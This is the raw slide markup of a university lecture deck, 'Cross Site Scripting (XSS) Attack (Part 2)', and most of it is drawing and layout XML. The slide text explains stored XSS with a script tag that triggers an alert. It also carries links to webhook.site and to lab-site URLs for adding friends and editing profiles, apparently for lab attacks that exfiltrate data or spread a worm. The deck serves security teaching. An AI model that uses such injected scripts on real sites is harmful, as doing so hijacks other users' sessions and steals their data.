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397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24" r:id="rId2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62" d="100"/>
          <a:sy n="162" d="100"/>
        </p:scale>
        <p:origin x="92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1:26:48.3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1 118 24575,'0'18'0,"0"-10"0,-1 0 0,2-1 0,-1 1 0,1-1 0,0 1 0,3 9 0,-3-14 0,0-1 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0-1 0,1 1 0,-1-1 0,4 1 0,46 4 0,1-3 0,80-5 0,-31 0 0,923 20 0,-920-14 0,-30-3 0,1 4 0,132 25 0,-106-11 0,164 10 0,-5-2 0,-239-23 0,70 12 0,171 6 0,836-23 0,-879-10 0,2 0 0,-93 15 0,119-5 0,-157-16 0,-5 0 0,530 4 0,-375 17 0,1498 94 0,-765-54 0,-681-41 0,241-9 0,-429-1 0,137-29 0,-138 9 0,-71 18 0,0 1 0,65-9 0,-31 10 0,-1-3 0,116-35 0,-121 27 0,1 2 0,1 3 0,0 3 0,125-5 0,343 16 0,-528 1 0,-1-1 0,1 0 0,0 0 0,0 0 0,-1 0 0,1-1 0,0 1 0,-1-1 0,1 1 0,0-1 0,-1 0 0,1 0 0,-1 0 0,1-1 0,-1 1 0,0-1 0,0 1 0,1-1 0,-1 0 0,0 1 0,0-1 0,2-4 0,-1 0 0,-1 0 0,0 0 0,0 0 0,0-1 0,-1 1 0,0-1 0,0 1 0,0-9 0,1 3 0,1-1 0,0 1 0,1 0 0,0 0 0,1 1 0,1-1 0,11-17 0,-17 29 0,0-1 0,0 1 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,1 0 0,-1-1 0,0 1 0,0 0 0,0-1 0,1 1 0,-1 0 0,0-1 0,1 1 0,-1 0 0,0-1 0,1 1 0,-1 0 0,0 0 0,1 0 0,-1-1 0,0 1 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,3 17 0,-7 26 0,-18 25-1365,13-51-5461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1:26:51.4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718 121 24575,'0'-1'0,"-1"-1"0,0 1 0,0-1 0,0 1 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 1 0,1-1 0,-1 0 0,1 1 0,-1-1 0,1 1 0,-1-1 0,1 1 0,-3-1 0,-1-1 0,-65-19 0,0 2 0,-2 4 0,-83-8 0,37 5 0,116 18 0,0 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 1 0,0-1 0,0 1 0,1-1 0,-1 1 0,0-1 0,0 1 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 1 0,1-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0 0 0,1-1 0,-1 1 0,1 0 0,-1 0 0,1 0 0,0-1 0,0 1 0,-1 3 0,0 11 0,0 0 0,0 0 0,4 27 0,-2-20 0,10 1568 0,-12-1081 0,-23 332 0,0 102 0,25 93 0,-6-953 0,-4-1 0,-39 164 0,10-61 0,34-168 0,1 1 0,1-1 0,0 1 0,2 0 0,2 31 0,-1-46 0,-1 0 0,1 0 0,1 0 0,-1 1 0,1-1 0,-1 0 0,1-1 0,0 1 0,1 0 0,-1 0 0,1-1 0,-1 0 0,1 1 0,0-1 0,1 0 0,-1 0 0,0-1 0,1 1 0,-1-1 0,1 1 0,0-1 0,0 0 0,0-1 0,0 1 0,0-1 0,0 0 0,0 0 0,1 0 0,7 1 0,40 2 0,1-2 0,-1-2 0,59-8 0,-17 1 0,403-18-1365,-434 23-5461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1:26:53.9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24575,'944'0'0,"-941"0"0,0 0 0,0 0 0,1 0 0,-1 0 0,0 1 0,0-1 0,0 1 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 1 0,-1-1 0,1 1 0,-1 0 0,1 0 0,1 2 0,-1 0 0,0 0 0,0 1 0,-1-1 0,0 1 0,0-1 0,0 1 0,-1 0 0,1 0 0,-1 0 0,1 9 0,6 71 0,-2 120 0,-4-70 0,11 1659 0,-16-1117 0,1-270 0,5 426 0,20-565 0,-10-154 0,-2 121 0,-12 197 0,1-426 0,0 0 0,0 0 0,-1 1 0,0-1 0,0 0 0,0 0 0,-1 0 0,0 0 0,-4 10 0,4-13 0,0 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,0-1 0,0 1 0,0-1 0,0 0 0,0 0 0,-1 0 0,1 0 0,-1-1 0,1 1 0,-1-1 0,0 0 0,-6 1 0,-40 6 0,-1-2 0,0-2 0,-86-6 0,68 0 0,-121-1-1365,123 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7:28:25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139 338 24575,'-13'155'0,"3"-63"0,-23 111 0,20-141 0,-8 115 0,10-49 0,-1 17 0,13 550 0,-6-653 0,1-26 0,0-24 0,-5-101 0,5 0 0,16-178 0,26-176 0,-32 413 0,2 0 0,2 1 0,32-89 0,-16 54 0,-16 44 0,7-56 0,2-12 0,-6 45 0,-2 0 0,-3-1 0,0-109 0,-8 167 0,-1 0 0,2 0 0,-1 0 0,1 0 0,0 0 0,0 1 0,0-1 0,1 0 0,4-8 0,-5 12 0,1-1 0,-1 1 0,1 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 1 0,1-1 0,-1 1 0,1 0 0,-1-1 0,1 1 0,0 0 0,-1 0 0,1 1 0,0-1 0,0 1 0,0-1 0,-1 1 0,5 0 0,302 0 0,-137 3 0,952 14 0,-483-12 0,241 13 0,-62 10 0,-574-17 0,-7 0 0,-87-7 0,163 25 0,-223-21 0,-53-6 0,64 13 0,-13-3 0,-74-12 0,0 1 0,0 1 0,0 1 0,0 0 0,0 1 0,-1 0 0,1 2 0,17 8 0,-31-12 0,1 0 0,-1 0 0,1 0 0,-1 1 0,0-1 0,0 1 0,0 0 0,0 0 0,-1-1 0,1 1 0,-1 0 0,0 1 0,1-1 0,-2 0 0,1 0 0,0 0 0,0 4 0,3 64 0,-3-37 0,34 891 0,-29-799 0,35 209 0,-5-85 0,-32-174 0,-3 0 0,-4 0 0,-2 0 0,-22 105 0,20-124 0,1 96 0,1-19 0,3-75 0,2-39 0,-1 1 0,0 0 0,-2-1 0,0 0 0,-2 1 0,-7 23 0,10-41 0,0-1 0,1 0 0,-1 1 0,0-1 0,0 0 0,0 0 0,0-1 0,0 1 0,-1 0 0,1-1 0,-1 1 0,1-1 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1-1 0,0 1 0,0-1 0,-4 1 0,-70 0 0,54-2 0,-730-62 0,566 40 0,-199-28 0,70 20 0,36 6 0,-374-42 0,420 47 0,-350-34 0,536 49 0,-618-68 0,276 30 0,301 35 0,-235-15 0,-26-3 0,263 14 0,37 5 0,-66-1 0,113 8 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,-1-1 0,1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,1-1 0,-1 1 0,0-1 0,1 1 0,-1-1 0,-3-4 0,4 4 0,1-1 0,-1 1 0,1 0 0,0-1 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,1 0 0,0 0 0,-1 1 0,1-1 0,0 0 0,0 0 0,1 1 0,-1-1 0,0 0 0,1 0 0,1-4 0,10-52 0,-4-1 0,-2 0 0,-2 0 0,-8-96 0,2 29 0,2 110-110,0 3-203,0 0-1,-1 1 0,-3-17 0,0 11-6512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7:28:28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1561 24575,'212'-88'0,"444"-151"0,-318 125 0,-139 43 0,742-240 0,-369 168 0,-385 90 0,895-210 0,62 122 0,-1082 135 0,1394-61 0,-793 45 0,-29 1 0,-47 10 0,7 0 0,2232 12 0,-2545 12 0,-119-4 0,6 2 0,115 2 0,48 5 0,-298-15 0,102 20 0,-39-5 0,-52-10 0,-1 2 0,55 20 0,-54-16 0,235 69 0,-257-76-1365,-3-2-5461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7:28:32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67 802 24575,'0'25'0,"1"188"0,-32 248 0,8-236 0,9 273 0,15 133 0,-1-629 0,0 1 0,0-1 0,1 1 0,-1-1 0,1 1 0,-1-1 0,1 1 0,0-1 0,0 0 0,0 1 0,0-1 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1-1 0,0 1 0,0-1 0,0 1 0,0-1 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,5 0 0,8 2 0,0 0 0,1-2 0,0 1 0,16-2 0,-6 0 0,159 3 0,0-8 0,307-48 0,67-41 0,-362 73 0,-6 1 0,-127 12 0,0 3 0,89 5 0,2-1 0,-151 1 0,1-1 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1-1 0,-1 0 0,0 0 0,0 0 0,0 0 0,0-1 0,-1 1 0,1-1 0,-1 0 0,1 0 0,-1 0 0,0-1 0,0 1 0,0-1 0,-1 1 0,1-1 0,-1 0 0,0 0 0,0 0 0,3-9 0,2-9 0,-1 0 0,-1-1 0,5-44 0,-6 40 0,39-519 0,-40-5 0,-4 318 0,-4 121 0,-22-126 0,10 113 0,-12-57 0,-5-40 0,26 155 0,-24-95 0,31 160 0,1 0 0,-1-1 0,0 1 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,0 0 0,1 0 0,-1 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 1 0,-1-1 0,1 1 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 1 0,-1-1 0,-2 2 0,-14 3 0,1 1 0,-1 1 0,-31 16 0,21-10 0,-154 60 0,-225 55 0,312-99 0,64-18 0,0-1 0,-1-1 0,0-2 0,-46 3 0,12-5 0,-114 24 0,60-7 0,-221 10 0,2-31 0,173-2 0,165 1 0,-1-1 0,0 1 0,1 0 0,-1 1 0,0-1 0,1 0 0,-1 1 0,0-1 0,1 1 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 1 0,1-1 0,0 0 0,0 1 0,0 0 0,0 0 0,0-1 0,0 1 0,-2 3 0,1 0 0,1 0 0,0 0 0,1 0 0,-1 1 0,1-1 0,0 0 0,1 1 0,-1-1 0,1 0 0,0 9 0,5 249-1365,-5-241-5461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10/17/2024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10/17/2024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customXml" Target="../ink/ink6.xml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customXml" Target="../ink/ink5.xml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svg"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink4.xml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hook.site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hook.site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hyperlink" Target="https://webhook.site/" TargetMode="Externa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xsslabelgg.com/action/friends/add?frien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sslabelgg.com/action/friends/ad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xsslabelgg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sslabelgg.com/action/profile/ed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xsslabelgg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sslabelgg.com/action/profile/ed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www.xsslabelgg.com/action/friends/add?friend" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.xsslabelgg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customXml" Target="../ink/ink3.xml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svg"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink2.xml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95057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Cross Site Scripting (XSS) Attack (Part 2)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1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rgbClr val="0000FF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https://www.cs.montana.edu/pearsall/classes/fall2024/476</a:t>
            </a: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(Stored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3581400" y="1397600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http://www.website.com/user=Mark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A00E76-BE03-5C07-CADB-7CBA2663F24A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3048000" y="2759409"/>
            <a:ext cx="624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1999DE-7DE0-8504-79D9-37327044B3BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4909259" y="2365802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Response (HTML)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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2AF9045C-904A-ADF3-8163-1033B96AC8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12264" y="3886200"/>
            <a:ext cx="914400" cy="9144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7CF2B7-FFA7-78C2-6446-68E23F7FCF6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10640132" y="2766780"/>
            <a:ext cx="429332" cy="1033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10DD0C-BE8F-7B9F-CB02-EA6988BAF576}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="10413136" y="2800232"/>
            <a:ext cx="371375" cy="1045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85B757-CF92-5C73-2280-B7FBA39348BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10906790" y="2612546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Pull all of Mark’s Information</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="413521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(Stored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3581400" y="1397600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http://www.website.com/user=Mark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A00E76-BE03-5C07-CADB-7CBA2663F24A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3048000" y="2759409"/>
            <a:ext cx="624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1999DE-7DE0-8504-79D9-37327044B3BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4909259" y="2365802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Response (HTML)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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2AF9045C-904A-ADF3-8163-1033B96AC8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12264" y="3886200"/>
            <a:ext cx="914400" cy="9144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7CF2B7-FFA7-78C2-6446-68E23F7FCF6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10640132" y="2766780"/>
            <a:ext cx="429332" cy="1033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10DD0C-BE8F-7B9F-CB02-EA6988BAF576}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="10413136" y="2800232"/>
            <a:ext cx="371375" cy="1045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85B757-CF92-5C73-2280-B7FBA39348BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10906790" y="2612546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Pull all of Mark’s Information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FF25D7-0772-6DEB-79BD-8C31BFFA33A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219200" y="1905000"/>
            <a:ext cx="205740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6FC957C-4342-D55A-6A12-B4F9AAEED662}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3429000" y="3429000"/>
            <a:ext cx="2124241" cy="293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Mark’s Account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 alert(“BAD!”);&lt;script&gt;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2687BE3-7969-C085-94F6-FA6B6D2DB5B2}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3463181" y="4321825"/>
              <a:ext cx="2102760" cy="1109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2687BE3-7969-C085-94F6-FA6B6D2DB5B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45541" y="4304185"/>
                <a:ext cx="2138400" cy="11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8A8A5A4-A954-A800-3CEB-32AF322180BA}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5566301" y="4274665"/>
              <a:ext cx="5109120" cy="561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8A8A5A4-A954-A800-3CEB-32AF322180B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48301" y="4256665"/>
                <a:ext cx="514476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A762627-0AC8-E44C-AD55-B62A4EEDB3F1}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="10683701" y="3769945"/>
              <a:ext cx="931320" cy="105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A762627-0AC8-E44C-AD55-B62A4EEDB3F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65701" y="3752305"/>
                <a:ext cx="966960" cy="10886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ADBE7C3-60D1-D51B-2C8B-031F07CB0CC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6254674" y="4982570"/>
            <a:ext cx="5271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example, the malicious script came from the database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> This script was probably maliciously injected in a previous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6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D6320-8F67-7CAB-919A-3D8DDE2106DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="228600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XSS Attack to display a message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E9FEB90-CE5C-F944-8929-61291E807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5" y="990600"/>
            <a:ext cx="10515600" cy="51477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8E97A2-5EA0-60AB-8641-8A5EDC6345C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553200" y="28956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Edit HTML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85AD2E-A0BE-B40F-E19C-C3E166551A65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="381000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Our malicious JavaScript</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4154830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4F0FF-D217-D7A9-F59A-BCA172D6DBD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="228600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XSS Attack to display a message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58BBB-9D8D-DB8F-8B7E-19FB35AF4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0608"/>
            <a:ext cx="9677400" cy="4439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5E6705-410A-39ED-D693-BF2D3FBE8B83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="838200"/>
            <a:ext cx="1166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when I am logged in as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Boby</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, when I visit Alice’s profile, her profile information gets displayed to the screen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F96FE-A88C-EA8E-F924-D3A139B97C4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="1409404"/>
            <a:ext cx="878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malicious script we injected earlier gets loaded and executed on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Boby’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> end (!!!)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="400193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1EC13F9D-73AE-4300-DE04-00D01D5A6707}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-6350" y="3787140"/>
            <a:ext cx="12204700" cy="3077210"/>
            <a:chOff x="-6350" y="3787140"/>
            <a:chExt cx="12204700" cy="3077210"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="10" name="object 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBC1088B-4908-1D2E-E10C-1153E3B8644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5376" y="3787140"/>
              <a:ext cx="4693920" cy="2898648"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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1F54AB39-2FC8-0A96-C8D6-EE6594106189}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8662034" y="4622304"/>
              <a:ext cx="2199640" cy="1346200"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2199640" h="1346200">
                  <a:moveTo>
                    <a:pt x="340487" y="1028699"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="246253" y="1028699"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317754" y="1079499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390017" y="1117599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="391541" y="1117599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="546226" y="1181099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="548767" y="1181099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="821563" y="1269999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="824611" y="1269999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1322070" y="1346199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1426210" y="1346199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1587119" y="1333499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1788668" y="1308099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1329817" y="1308099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="832485" y="1219199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="835660" y="1219199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="563499" y="1130299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="565912" y="1130299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="411225" y="1066799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412750" y="1066799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="340487" y="1028699"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2199640" h="1346200">
                  <a:moveTo>
                    <a:pt x="1850898" y="1295399"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1421638" y="1295399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1374267" y="1308099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1830705" y="1308099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1850898" y="1295399"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2199640" h="1346200">
                  <a:moveTo>
                    <a:pt x="1889252" y="1282699"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1581912" y="1282699"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1421257" y="1295399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1870710" y="1295399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1889252" y="1282699"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2199640" h="1346200">
                  <a:moveTo>
                    <a:pt x="1964055" y="1244599"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1837690" y="1244599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1818640" y="1257299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1783334" y="1257299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1581658" y="1282699"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1909572" y="1282699"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1928495" y="1269999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1946021" y="1257299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1964055" y="1244599"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2199640" h="1346200">
                  <a:moveTo>
                    <a:pt x="2018411" y="1142999"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1991233" y="1168399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1992249" y="1168399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1954276" y="1193799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1955800" y="1193799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1939036" y="1206499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1939925" y="1206499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1922780" y="1219199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1907159" y="1219199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1889252" y="1231899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1890268" y="1231899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1871980" y="1244599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1981835" y="1244599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1983359" y="1231899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2022475" y="1206499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2049653" y="1181099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2050542" y="1181099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2076831" y="1168399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2078101" y="1155699"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2017649" y="1155699"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2018411" y="1142999"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2199640" h="1346200">
                  <a:moveTo>
                    <a:pt x="2097278" y="1066799"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2042668" y="1130299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2043938" y="1130299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2017649" y="1155699"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2078101" y="1155699"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2132584" y="1104899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2134616" y="1104899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2140966" y="1092199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2141601" y="1092199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2148332" y="1079499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2095246" y="1079499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2097278" y="1066799"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2199640" h="1346200">
                  <a:moveTo>
                    <a:pt x="2159889" y="1066799"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2101723" y="1066799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2095246" y="1079499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2154555" y="1079499"/>
